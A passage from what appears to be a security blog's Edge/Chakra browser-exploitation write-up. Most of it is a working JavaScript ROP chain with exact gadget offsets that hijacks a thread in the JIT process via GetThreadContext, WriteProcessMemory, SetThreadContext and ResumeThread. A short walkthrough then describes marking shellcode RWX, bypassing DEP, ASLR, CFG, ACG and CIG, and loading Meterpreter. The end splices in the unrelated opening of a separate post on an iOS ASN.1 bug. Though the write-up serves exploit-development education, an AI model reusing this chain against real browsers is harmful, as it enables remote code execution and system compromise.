	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// VirtualAlloc() ROP chain
	// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

	// DWORD flProtect (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// LPVOID lpAddress (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
	next();

	// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
	next();

	// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
	next();

	// Call KERNELBASE!VirtualAlloc
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	next();

	// GetThreadContext() ROP chain
    // Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

    // First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
    // The value we need to set is 0x10001F
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // HANDLE hThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // LPCONTEXT lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
    next();

    // Call KERNELBASE!GetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();

    // Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
	next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
    next();

    // WriteProcessMemory() ROP chain (Number 4)
    // Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // LPCVOID lpBuffer (R8)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is
    next();

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
    next();                                                                     // Recall RAX already has a writable pointer in it  

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
	// SetThreadContext() ROP chain
    // Stage 10 -> Update our remote thread's RIP to return execution into our VirtualProtect ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // const CONTEXT *lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
    next();

    // Call KERNELBASE!SetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x7aa0, kernelbaseHigh); // KERNELBASE!SetThreadContext address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!SetThreadContext)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!SetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();

    // ResumeThread() ROP chain
    // Stage 11 -> Resume the thread, with RIP now pointing to a return into our ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // Call KERNELBASE!ResumeThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x70a50, kernelbaseHigh); // KERNELBASE!ResumeThread address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!ResumeThread)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!ResumeThread - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    next();
}
</script>

Let’s start by setting a breakpoint on a jmp rax gadget to reach our SetThreadContext call.

The first parameter we will deal with is the handle to the remote thread we have within the JIT process.

This brings our calls to the following states:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	-
);
ResumeThread(
	-
);

The next parameter we will set is the pointer to our updated CONTEXT structure.

We then can get SetThreadContext into RAX and call it. The call should be in the following state:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
);

We then can execute our SetThreadContext call and hit our first ResumeThread gadget.

ResumeThread only has one parameter, so we will fill it and set up RAX BUT WE WILL NOT YET EXECUTE THE CALL!

ResumeThread(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
);

Before we execute ResumeThread, we now need to attach another WinDbg instance to the JIT process. We will set a breakpoint on our ret gadget and see if we successfully control the remote thread!

Coming back to the content process, we can hit pt to execute our call to ResumeThread, which should kick off execution of our remote thread within the JIT process!

Going back to the JIT process, we can see our breakpoint was hit and our ROP chain is on the stack! We have gained code execution in the JIT process!

Our last step will be to walk through our VirtualProtect ROP chain, which should mark our shellcode as RWX. Here is how the call should look:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address
);

Executing the ret gadget, we hit our first ROP gadgets which setup the lpflOldProtect parameter, which is any address that is writable

We are now here:

VirtualProtect(
	-
	-
	-
	addressof(data_address) 			// Any writable address
);

The next parameter we will address is the lpAddress parameter - which is the address of our shellcode (the page we want to mark as RWX)

We are now here:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	-
	-
	addressof(data_address) 			// Any writable address
);

Next up is dwSize, which we set to 0x1000.

We are now here:

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	-
	addressof(data_address) 			// Any writable address
);

The last parameter is our page protection, which is PAGE_EXECUTE_READWRITE.

We are now all setup!

VirtualProtect(
	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address
);

After executing the function call, we have marked our shellcode as RWX! We have successfully bypassed Arbitrary Code Guard and have generated dynamic RWX memory!

The last thing for us is to ensure execution reaches our shellcode. After executing the VirtualProtect function, let’s see if we hit the last part of our ROP chain - which should push our shellcode address onto the stack, and return into it.

That’s it! We have achieved our task and we now can execute our shellcode!

An exploit GIF shall suit us nicely here!

Meterpreter is also loaded as a reflective, in memory DLL - meaning we have also taken care of CIG as well! That makes for DEP, ASLR, CFG, ACG, CIG, and no-child process mitigation bypasses! No wonder this post was so long!

Conclusion

This was an extremely challenging and rewarding task. Browser exploitation has been a thorn in my side for a long time, and I am very glad I now understand the basics. I do not yet know what is in my future, but if it is close to this level of complexity (I, at least, thought it was complex) I should be in for a treat! It is 4 a.m., so I am signing off now. Here is the final exploit on my GitHub.

Peace, love, and positivity :-)

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

By: Anonymous
7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

